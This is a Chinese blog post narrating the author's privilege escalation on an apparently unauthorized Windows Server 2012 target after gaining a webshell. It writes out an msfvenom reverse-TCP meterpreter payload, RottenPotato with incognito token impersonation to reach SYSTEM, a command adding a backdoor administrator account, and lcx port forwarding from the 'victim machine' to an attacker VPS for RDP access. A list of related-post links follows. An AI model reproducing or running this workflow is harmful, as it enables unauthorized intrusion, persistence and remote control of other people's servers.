记一次WindowsServer2012提权 - 烂土豆
Emm Shell都好久了 操 最近好铁铁又喊我来提
因为自己提权不怎么会,最近学了一点 放了学就回家抓紧吃完饭开始提权了
期间感谢Gu表哥和丞相哥哥
此次主题:烂土豆
shell咋拿的 我也忘了 好像是添加友情链接那里还是啥 不重要了
直接获取shell后 先用systeminfo > 1.txt了一下 然后放到了 windows-exploit-suggester 里跑了一下
出来了有这几个
然后尝试用MS16-075进行提权 emm 最后有点懵逼
没咋搞懂
后来看一些文章 用到了烂土豆!! 我也直接上烂土豆了
先用msf获取shell
msfvenom -p windows/meterpreter/reverse_tcp LHOST=ip LPORT=port -f exe > /tt.exe
然后msf再设置lhost lport run
打到shell
然后使用ms16-075
emm 简单流程是这样
先常规一波 getsystem !! 成功失败
重头戏 烂土豆
传到目标服务器上
我用的蚁剑
然后进去窃取令牌的模块
use incognito
list_tokens -u
IIS我们本来的权限 很低!!
进入到那个文件的目录里
运行他execute -cH -f ./rottenpotato.exe
重新list_tokens -u
system出来了
然后impersonate_token "NT AUTHORITY\\SYSTEM"
绿了 绿了 成功system
加个用户
加上administrator
net localgrouop Administrator diaomao /add
改编码
chcp 65001
直接连3389并没成功 拿出LCX端口转发一下 !!! 令人气愤的是 找了几个lcx都不可以 最后还是找到了个能用的
vps端lcx.exe -listen 51 5678
把51端口 转到5678端口上
受害机lcx.exe -slave VPS的IP 51 本地IP 3389
然后本地直接127.0.0.1:5678
成功拿捏
相关推荐
tianhuak 2020-11-24
huha 2020-10-16
lianshaohua 2020-09-23
laisean 2020-11-11
zhangjie 2020-11-11
大牛牛 2020-10-30
firefaith 2020-10-30
liguojia 2020-10-20
wangzhaotongalex 2020-10-20
以梦为马不负韶华 2020-10-20
CARBON 2020-10-20
彼岸随笔 2020-10-20
lianshaohua 2020-10-20
yutou0 2020-10-17
JohnYork 2020-10-16
xiaonamylove 2020-10-16
Julyth 2020-10-16
applecarelte 2020-10-16
ourtimes 2020-10-16